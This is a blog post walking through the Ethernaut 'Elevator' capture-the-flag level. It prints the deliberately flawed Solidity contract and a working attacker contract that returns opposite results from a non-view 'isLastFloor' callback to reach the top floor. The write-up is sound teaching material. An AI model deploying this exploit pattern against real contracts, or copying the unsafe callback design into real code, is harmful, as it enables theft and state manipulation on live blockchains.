DEV Community

Erhan Tezcan
Erhan Tezcan

Posted on

Ethernaut: 11. Elevator

#solidity #ethereum #openzeppelin #security

Play the level

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

interface Building {
  function isLastFloor(uint) external returns (bool);
}

contract Elevator {
  bool public top;
  uint public floor;

  function goTo(uint _floor) public {
    Building building = Building(msg.sender);

    if (! building.isLastFloor(_floor)) {
      floor = _floor;
      top = building.isLastFloor(floor);
    }
  }
}
Enter fullscreen mode Exit fullscreen mode

In this level, we will write the Builder contract which the elevator interacts with. However, in the same transaction we will return opposite boolean results for isLastFloor function.

// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.0;

interface Elevator {
  function goTo(uint _floor) external;    
}

contract Building {
  bool toggleMe = true;

  function isLastFloor(uint) external returns (bool) {
    toggleMe = !toggleMe;
    return toggleMe;
  }

  function callElevator(address _elevator) public {
    Elevator(_elevator).goTo(1);
  }

}
Enter fullscreen mode Exit fullscreen mode

The problem here is that Elevator did not specify isLastFloor to be a view function, which would prevent us from modifying the state like this. Another attack approach would be to return different results depending on the input data without modifying state, such as via gasLeft().

Top comments (0)

Read next

schalkneethling profile image

7 Frameworks, One SAML Jackson - Your Open Source Single Sign-On Solution

Schalk Neethling -

logeshn21 profile image

COMMON VULNERABILITIES: REENTRANCY PART — I

Logesh N -

sebastianccc profile image

The XZ attack and timeline

Sebastian Christopher -

nr18 profile image

Compliant infrastructure using infrastructure as code

Joris Conijn -